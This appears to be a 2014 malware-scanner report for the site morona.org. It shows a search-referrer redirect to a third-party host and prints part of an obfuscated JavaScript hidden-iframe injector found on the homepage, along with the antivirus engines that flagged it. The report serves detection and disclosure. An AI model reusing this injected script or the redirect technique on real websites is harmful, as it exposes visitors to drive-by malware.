New scan:

Malware Scanner report for morona.org

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://bobomo.mynumber.org/
1475 websites infected.

The website "morona.org" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://morona.org/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: morona.org
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 03 Sep 2014 06:37:30 GMT
Location: http://bobomo.mynumber.org/
Server: HTTPD
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://morona.org/
200 OK
Content-Length: 10487
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var var1=16;var1--;var var1=red('sZO4tb',15);var var2='hag';function red(str,shift){var var4,ch,var6,var5,cnt1,ext,ich,len,sh,pos,cnt2,sux,var2,var1,var3,ch,ret;var var1=0.01;var var2=15;var2++;function jar(brr,dab){var var3=22;return brr}var var4=7;var4+=4757;var var3='DkYgindeK5'.substr(4,4);var var5=4909;var var6=0.009;var6++;var3+='B8xxOfQm'.substr(3,3);function lin(the,eat,sel){var var7=0;do{var var8=5147;var8+=21;var7++}while(var7<6);for(var var9=0;var9<5;var9++){var var10=[35,0,7,28
... 3063 bytes are skipped ...
ar40=null;var40+=0.017; ifrm.style.visibility='hidden'; var var41=28;for(var var42=0;var42<4;var42++){var var43=[21,14,28,7,35,0]} document.body.appendChild(ifrm);var var44=25;var var45='MVqX8HSF';iframeWasCreated=true;var var46=0.01;var46--}var var47=4588;var var48=5;var48++}catch(e){iframeWasCreated=undefined}var var49=0.001;var49--;for(var var50=0;var50<7;var50++){var var51=4834;var51+=8;var var52=0.008;var52+=0.013}}, 100);var var53=9;var53--;var var54=13;var54++;

Antivirus reports:

AntiVir
JS/iFrame.ceg
Avast
JS:Iframe-TE [Trj]
Ikarus
Trojan.IframeRef
Rising
Trojan.Script.JS.IframeRef.e
nProtect
Trojan.JS.Iframe.CEG
K7AntiVirus
Trojan
TrendMicro-HouseCall
TROJ_GEN.RCBH1AH
Emsisoft
Trojan.JS.Iframe.CEG (B)
Comodo
TrojWare.JS.Iframe.QD
DrWeb
JS.IFrame.399
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframe.CS
MicroWorld-eScan
Trojan.JS.Iframe.CEG
NANO-Antivirus
Trojan.Script.Agent.bgwitj
F-Secure
Trojan.JS.Iframe.CEG
F-Prot
JS/IFrame.RR
AVG
HTML/Framer.GF
Norman
Agent.ALETV
GData
Trojan.JS.Iframe.CEG
Commtouch
JS/IFrame.RR
BitDefender
Trojan.JS.Iframe.CEG

http://morona.org/test404page.js
404 Not Found
Content-Length: 955
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=morona.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://morona.org/

Result: morona.org is not infected or malware details are not published yet.